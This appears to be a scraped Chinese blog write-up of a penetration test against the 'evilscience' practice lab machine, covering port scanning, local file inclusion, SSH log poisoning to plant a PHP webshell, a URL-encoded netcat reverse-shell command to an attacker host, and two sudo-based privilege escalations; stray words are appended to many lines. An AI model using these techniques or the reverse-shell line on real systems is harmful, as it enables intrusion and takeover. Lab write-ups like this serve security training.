kali滲透綜合靶機(十六)--evilscience靶機

kali滲透綜合靶機(十六)--evilscience靶機php

 

1、主機發現python

1.netdiscover -i eth0 -r 192.168.10.0/24shell

  

2、端口掃描bash

1. masscan --rate=10000 -p0-65535 192.168.10.195ssh

   

三端口服務識別測試

1. nmap -sV -T4 -O -p 22,80 192.168.10.195 編碼

  

4、漏洞查找與利用url

1.目錄掃描spa

  

2. 發現http://192.168.10.195/fuck,下載下來沒啥用.net

3.發現http://192.168.10.195/index.php?file=about.php 測試存在本地文件包含

  

4.包含/etc/passwd,失敗,嘗試用burp進行模糊測試,能夠看到能夠包含/var/log/auth.log文件,能夠利用ssh登陸產生錯誤日誌

  

5. 利用ssh登陸產生錯誤日誌,能夠看到錯誤信息寫入到日誌中,能夠利用ssh錯誤日誌寫入一句話木馬

  

  

6.利用ssh日誌寫入一句話木馬

  

7.測試一句話是否成功寫入,下圖能夠看到成功執行,而後能夠執行任何系統命令

  

8.反彈shell,須要對反彈shell中特殊符號進行url編碼,不要對整個url進行編碼

mknod+backpipe+p+%26%26+nc+192.168.1.66+9999+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe

  

9.kali端開啓監聽,而後用python -c ‘import pty;pty.spawn(「/bin/bash」)’,從新打開一個終端

  

10.上圖看到用python -c 打開的一個終端仍是受限的,須要在用awk ‘BEGIN{system(「/bin/bash」)}’從新打開一個終端

提權一:

1.Sudo -l查看是否屬於sudo組

  

2. 能夠使用sudo權限不須要密碼執行xxxlogauditorxxx.py,查看一下該文件的權限, 該py文件的配置錯誤,致使能夠直接以root權限執行命令,查看腳本存在命令執行漏洞

  

3.msfvenom生成一個payload,上傳到目標,增長執行權限

  

4.sudo運行該腳本,

  

5.kali開啓監聽

  

提權二:

1.首先給/etc/sudoers加寫入權限

  

2.而後把當前用戶以不用密碼的登陸方式添加到sudo組

  

3.sudo -i 得到root權限

  

相關文章
相關標籤/搜索